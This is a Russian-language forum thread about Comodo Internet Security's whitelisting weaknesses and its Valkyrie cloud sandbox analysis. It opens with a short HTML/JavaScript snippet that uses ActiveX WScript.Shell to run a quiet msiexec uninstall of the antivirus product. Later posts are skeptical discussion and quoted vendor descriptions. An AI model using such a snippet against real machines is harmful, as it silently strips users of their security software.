Было время, когда ... Неудачный сценарий вроде(конечно поправил, т.к.):
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head>
<script language="JavaScript" type="text/javascript">
function run()
{
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
}
</script>
</head>
<input type="button" value="Lancer" onclick="run()">
</body>
</html>
запустить автоматическое удаление продукта ... Внесение в белый список - ахиллесова пята этой игрушки.
Думаю Вам лучше продемонстрировать эту брешь через ролик на Youtube в противном случаи это просто слух. Я сам ещё не видел случая чтобы HIPS давал возможность чему то удалить антивирус. Он как Вебовская самозащита крепко держит удар.
"Внесение в белый список - ахиллесова пята этой игрушки" - вообще белый список это ахиллесова пята всех игрушек. Поэтому над улучшением вердикта трудятся все вендоры.
У Comodo как я понял файлы из авто-песочницы улетают на отдельную облачную-песочницу Valkyrie. И там уже проводится анализ файла. Судя по сводкам анализ проходит тщательно:
https://verdict.valkyrie.comodo.com/file/kill/chain?s=75a33287d84dc5f40a36a10394ed7295ed4c3f13- файл "Неизвестный" но уже близок к вердикту "Malware". Тип анализа делится на несколько категорий: https://verdict.valkyrie.comodo.com/file/result?s=0198d0e460bb0d9557b37bd90796279703a6de8b
Из старых данных говорится что облачное сканирование основано не только на хэшах:
Нераспознанные файлы одновременно загружаются на серверы Comodo Instant Malware Analysis для дальнейших проверок:
Во-первых, файлы проходят повторную антивирусную проверку на наших серверах.
Если сканирование обнаруживает, что файл является вредоносным (например, эвристический анализ обнаруживает, что это совершенно новый вариант), он определяется как вредоносный. Этот результат отправляется обратно в локальную установку CIS, а локальный и глобальный черный список обновляется.
Если сканирование не обнаруживает вредоносный файл, он переходит к следующему этапу проверки - мониторингу поведения.
Система анализа поведения - это облачная служба, которая помогает определить, демонстрирует ли файл вредоносное поведение. После отправки в систему неизвестный исполняемый файл будет автоматически запущен в виртуальной среде, и все действия, которые он предпринимает, будут отслеживаться. Например, будут регистрироваться созданные процессы, изменения файлов и ключей реестра, изменения состояния хоста и сетевая активность.
Если обнаруживается, что такое поведение является вредоносным, подпись исполняемого файла автоматически добавляется в черный список антивируса.
Если вредоносное поведение не зарегистрировано, файл помещается в «Нераспознанные файлы» и передается нашим техническим специалистам для дальнейшей проверки. Примечание. Анализ поведения может идентифицировать вредоносные файлы и добавлять их в глобальный черный список, но не может объявить файл «безопасным». Статус «безопасный» может быть присвоен файлу только после более тщательной проверки нашими техническими специалистами.
В любом случае результат будет отправлен на вашу установку Comodo Internet Security (CIS) примерно через 15 минут. Если исполняемый файл не был признан вредоносным, он будет запущен в автоматической песочнице. Он будет одновременно добавлен в список «Нераспознанные файлы» и загружен нашим техническим специалистам для анализа. Если обнаруживается, что это угроза, CIS покажет пользователю предупреждение AV. В этом предупреждении пользователь может выбрать карантин, очистить (удалить) или вылечить вредоносный файл. Эта новая угроза будет автоматически добавлена в глобальную базу данных черного списка и, следовательно, принесет пользу всем пользователям CIS.
По факту никаких ответов через 15 минут нет тут они лукавят но суть получения билета в белый список у них такая.